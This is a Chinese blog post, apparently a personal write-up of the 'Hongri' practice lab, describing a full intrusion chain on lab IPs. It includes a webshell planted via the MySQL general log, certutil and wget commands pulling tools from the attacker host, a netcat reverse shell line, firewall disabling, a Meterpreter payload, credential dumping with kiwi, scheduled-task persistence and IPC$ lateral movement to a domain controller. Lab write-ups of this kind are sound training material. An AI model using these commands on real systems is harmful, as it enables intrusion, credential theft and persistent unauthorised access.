<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-undefined.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"acindm.github.io","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":true,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":true,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="红日靶场 编辑虚拟网络   kali   Win 7   Win2K3&#x2F;2008 R2   查看本机ip   开靶机和未开靶机对比，得知目标主机IP为192.168.229.129   启动Win7中的Web服务   nmap扫描一下目标主机，发现开放了80, 3306端口   对目标进行访问，发现默认页面为phpStudy 探针,泄露大量信息。   目录扫描，发现后台登录界面的网址">
<meta property="og:type" content="article">
<meta property="og:title" content="红日靶场">
<meta property="og:url" content="https://acindm.github.io/2023/10/18/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA-1/index.html">
<meta property="og:site_name" content="acind の blog">
<meta property="og:description" content="红日靶场 编辑虚拟网络   kali   Win 7   Win2K3&#x2F;2008 R2   查看本机ip   开靶机和未开靶机对比，得知目标主机IP为192.168.229.129   启动Win7中的Web服务   nmap扫描一下目标主机，发现开放了80, 3306端口   对目标进行访问，发现默认页面为phpStudy 探针,泄露大量信息。   目录扫描，发现后台登录界面的网址">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps113.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps114.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps115.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps116.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps117.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps118.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps119.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps120.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps121.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps122.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps123.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps124.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps125.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps126.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps127.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps128.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps129.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps130.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps131.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps132.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps133.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps134.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps135.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps136.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps137.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps138.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps139.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps140.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps141.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps142.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps143.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps144.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps145.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps146.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps147.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps148.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps149.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps150.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps151.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps152.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps153.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps154.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps155.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps156.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps157.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps158.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps159.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps160.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps161.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps162.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps163.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps164.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps165.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps166.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps167.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps168.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps169.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps170.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps171.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps172.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps173.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps174.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps175.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps176.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps177.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps178.jpg">
<meta property="og:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps179.jpg">
<meta property="article:published_time" content="2023-10-18T07:41:58.000Z">
<meta property="article:modified_time" content="2024-03-11T10:51:15.486Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="file:///C:/Users/lm/AppData/Local/Temp/ksohtml17332/wps113.jpg">

<link rel="canonical" href="https://acindm.github.io/2023/10/18/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA-1/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>红日靶场 | acind の blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">acind の blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">1</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">0</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">5</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://acindm.github.io/2023/10/18/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA-1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png.jpg">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="Welcome to the 1/30000 🫧">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="acind の blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          红日靶场
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-10-18 15:41:58" itemprop="dateCreated datePublished" datetime="2023-10-18T15:41:58+08:00">2023-10-18</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-03-11 18:51:15" itemprop="dateModified" datetime="2024-03-11T18:51:15+08:00">2024-03-11</time>
              </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>1.4k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>5 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><strong>红日靶场</strong></p>
<p>编辑虚拟网络</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps113.jpg" alt="img"> </p>
<p>kali</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps114.jpg" alt="img"> </p>
<p>Win 7</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps115.jpg" alt="img"> </p>
<p>Win2K3&#x2F;2008 R2</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps116.jpg" alt="img"> </p>
<p>查看本机ip</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps117.jpg" alt="img"> </p>
<p>开靶机和未开靶机对比，得知目标主机IP为192.168.229.129</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps118.jpg" alt="img"> </p>
<p>启动Win7中的Web服务</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps119.jpg" alt="img"> </p>
<p>nmap扫描一下目标主机，发现开放了80, 3306端口</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps120.jpg" alt="img"> </p>
<p>对目标进行访问，发现默认页面为phpStudy 探针,泄露大量信息。</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps121.jpg" alt="img"> </p>
<p>目录扫描，发现后台登录界面的网址</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps122.jpg" alt="img"> </p>
<p>尝试访问</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps123.jpg" alt="img"> </p>
<p>抓包发现没有进行防爆破，尝试进行爆破</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps124.jpg" alt="img"> </p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps125.jpg" alt="img"> </p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps126.jpg" alt="img"> </p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps127.jpg" alt="img"> </p>
<p>账密为root&#x2F;root,进入后台</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps128.jpg" alt="img"> </p>
<p>将变量中的general log更改为ON，将general log file的路径更改为当前网站根目录下路径C:\phpStudy\WWW\test.php。（开启 SQL 的通用查询日志功能，并将日志文件保存在该路径）<img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps129.jpg" alt="img"></p>
<p>在SQL界面写入一句话木马</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps130.jpg" alt="img"> </p>
<p>访问<a target="_blank" rel="noopener" href="http://192.168.229.129/test.php?test=phpinfo();%E9%AA%8C%E8%AF%81%E6%88%90%E5%8A%9F%E6%8F%92%E5%85%A5">http://192.168.229.129/test.php?test=phpinfo();验证成功插入</a></p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps131.jpg" alt="img"> </p>
<p>将nc和wget.exe放入&#x2F;var&#x2F;www&#x2F;html目录下，然后启动Apache服务。</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps132.jpg" alt="img"> </p>
<p>查看服务的状态</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps133.jpg" alt="img"> </p>
<p>服务已正常启动，访问127.0.0.1看到默认页面</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps134.jpg" alt="img"> </p>
<p>WEBSHELL中执行，完整命令为<a target="_blank" rel="noopener" href="http://192.168.229.129/test.php?test=system">http://192.168.229.129/test.php?test=system</a>(“certutil -urlcache -split -f <a target="_blank" rel="noopener" href="http://192.168.229.128/wget.exe">http://192.168.229.128/wget.exe</a> C:\phpStudy\WWW\wget.exe”);</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps135.jpg" alt="img"> </p>
<p>通过Windows下的dir命令查看,<a target="_blank" rel="noopener" href="http://192.168.229.129/test.php?test=system(%22dir%22)">http://192.168.229.129/test.php?test=system(&quot;dir&quot;)</a>;</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps136.jpg" alt="img"> </p>
<p>之后使用wget将整个nc的文件夹下载下来。WEBSHELL中执行wget -r -np -nH –cut-dirs&#x3D;1 <a target="_blank" rel="noopener" href="http://192.168.100.128/nc/">http://192.168.100.128/nc/</a></p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps137.jpg" alt="img"> </p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps138.jpg" alt="img"> </p>
<p>之后在kali上进行监听，再让Win7连接kali。靶机的WEBSHELL中执行nc 192.168.229.128 8888 -e cmd.exe</p>
<p><a target="_blank" rel="noopener" href="http://192.168.229.129/test.php?test=system">http://192.168.229.129/test.php?test=system</a>(“nc 192.168.229.128 8888 -e cmd.exe”);</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps139.jpg" alt="img"> </p>
<p>攻击机执行nc -vlp 8888</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps140.jpg" alt="img"> </p>
<p>权限维持与内网信息收集</p>
<p>首先修改cmd的字符编码为utf-8（chcp 65001），以此来避免乱码问题</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps141.jpg" alt="img"> </p>
<p>获取系统信息</p>
<p>有用信息：1.主机加了一个域god.org</p>
<p>2.此主机的网络配置，内网网段包含192.168.52.143</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps142.jpg" alt="img"> </p>
<p>Whoami得知我们现在的用户为administrator，属于god域</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps143.jpg" alt="img"> </p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps144.jpg" alt="img"> </p>
<p>关闭windows防火墙</p>
<p>（”netsh” 是一个用于配置和监控各种网络设置的命令行工具。”advfirewall” 是 Windows Firewall（也称为Windows防火墙）的管理组件。”set currentprofile” 表示该命令将应用于当前活动的配置文件，即当前正在使用的防火墙配置文件。”state off” 意味着将关闭当前活动的防火墙配置文件。）</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps145.jpg" alt="img"> </p>
<p>修改注册表以允许远程桌面连接</p>
<p>HKEY_LOCAL_MACHINE” 分支下的 “SYSTEM\CurrentControlSet\Control\Terminal Server:修改的位置</p>
<p>&#x2F;v fDenyTSConnections：修改的键值名称 fDenyTSConnections 是表示是否允许远程桌面连接的</p>
<p>&#x2F;t REG_DWORD：设定数据类型</p>
<p>&#x2F;d 0：设置数据</p>
<p>&#x2F;f：强制操作</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps146.jpg" alt="img"> </p>
<p>启动远程桌面服务</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps147.jpg" alt="img"> </p>
<p>进行远程桌面连接</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps148.jpg" alt="img"> </p>
<p>创建一个msf的木马，将这个木马移动到&#x2F;var&#x2F;www&#x2F;html文件夹下</p>
<p>-p    指定payload</p>
<p>LHOST  攻击机IP</p>
<p>LPORT  监听端口</p>
<p>-f    确定输出格式</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps149.jpg" alt="img"> </p>
<p>让目标下载这个木马</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps150.jpg" alt="img"> </p>
<p>进入msf框架的命令行</p>
<p>use exploit&#x2F;multi&#x2F;handler使用“多模块”漏洞利用程序</p>
<p>set payload windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp设置要使用的负载类型，指定了Windows 64位操作系统上的Meterpreter负载</p>
<p>set lhost设置攻击机器的IP地址</p>
<p>set lport设置监听端口号</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps151.jpg" alt="img"> </p>
<p>运行木马</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps152.jpg" alt="img"> </p>
<p>成功返回结果</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps153.jpg" alt="img"> </p>
<p>getsystem进一步提权，getuid查看提权结果</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps154.jpg" alt="img"> </p>
<p>导入kiwi模块，获取到系统中的用户名和密码</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps155.jpg" alt="img"> </p>
<p>creds_all获取目标系统上存储的凭据信息</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps156.jpg" alt="img"> </p>
<p>设置一个定时任务，以免连接被断开。（taskschd.msc打开任务计划程序）</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps157.jpg" alt="img"> </p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps158.jpg" alt="img"> </p>
<p>创建完成，重启win7进行验证</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps159.jpg" alt="img"> </p>
<p>在攻击机上监听</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps160.jpg" alt="img"> </p>
<p>下面是内网信息收集</p>
<p>查看当前计算机&#x2F;域基本信息（net config workstation）</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps161.jpg" alt="img"> </p>
<p>已经知道了当前主机在GOD域中</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps162.jpg" alt="img"> </p>
<p>可知域控主机名为OWA</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps163.jpg" alt="img"> </p>
<p>查询域用户</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps164.jpg" alt="img"> </p>
<p>查看域的密码策略</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps165.jpg" alt="img"> </p>
<p>获取域管理员列表</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps166.jpg" alt="img"> </p>
<p>扫描当前内网网段，扫描出了138&#x2F;141两个IP（143前面已经知道是跳板机IP）</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps167.jpg" alt="img"> </p>
<p>ping一下OWA查看域控的IP</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps168.jpg" alt="img"> </p>
<p>至此内网的基本信息收集结束</p>
<p>横向移动</p>
<p>对域控进行扫描</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps169.jpg" alt="img"> </p>
<p>通过上面的信息收集，我们发现我们当前的账号在域中有登记，并不只是本地账户，因此我们可以尝试与域控直接进行IPC连接。</p>
<p>发现同时开启了139&#x2F;445端口，有可能可以进行IPC连接。</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps170.jpg" alt="img"> </p>
<p>net use \目标IP\ipc$ “密码” &#x2F;user:”账户”，它的作用是使用 IPC（Inter-Process Communication，进程间通信）连接到目标 IP 地址上的 ipc$ 共享资源。</p>
<p>net use 命令可以将本地系统的某个共享资源映射到远程系统上，并进行访问。</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps171.jpg" alt="img"> </p>
<p>尝试操控目标主机</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps172.jpg" alt="img"> </p>
<p>尝试让目标主机运行nc</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps173.jpg" alt="img"> </p>
<p>查看目标当前的时间</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps174.jpg" alt="img"> </p>
<p>使用at命令为目标创建一个计划任务，让其在指定的时间运行命令</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps175.jpg" alt="img"> </p>
<p>Win7上开启监听，到时间后成功回弹</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps176.jpg" alt="img"> </p>
<p>之后尝试将shell反弹回攻击机上</p>
<p>在Win7上创建一个端口转发</p>
<p>listenaddress：监听地址</p>
<p>listenport：监听端口</p>
<p>connectaddress：连接地址</p>
<p>connectport：连接端口</p>
<p>netsh interface portproxy show v4tov4：显示当前系统中的转发规则</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps177.jpg" alt="img"> </p>
<p>之后让域控连接Win7的9999端口</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps178.jpg" alt="img"> </p>
<p>在攻击机上开启端口9999的监听，在攻击机上成功获取域控的shell</p>
<p><img data-src="file:///C:\Users\lm\AppData\Local\Temp\ksohtml17332\wps179.jpg" alt="img"> </p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/10/18/w1r3s%E9%9D%B6%E5%9C%BA/" rel="prev" title="w1r3s靶场">
      <i class="fa fa-chevron-left"></i> w1r3s靶场
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/10/18/Hackdamic%E9%9D%B6%E6%9C%BA/" rel="next" title="Hackdamic靶机">
      Hackdamic靶机 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
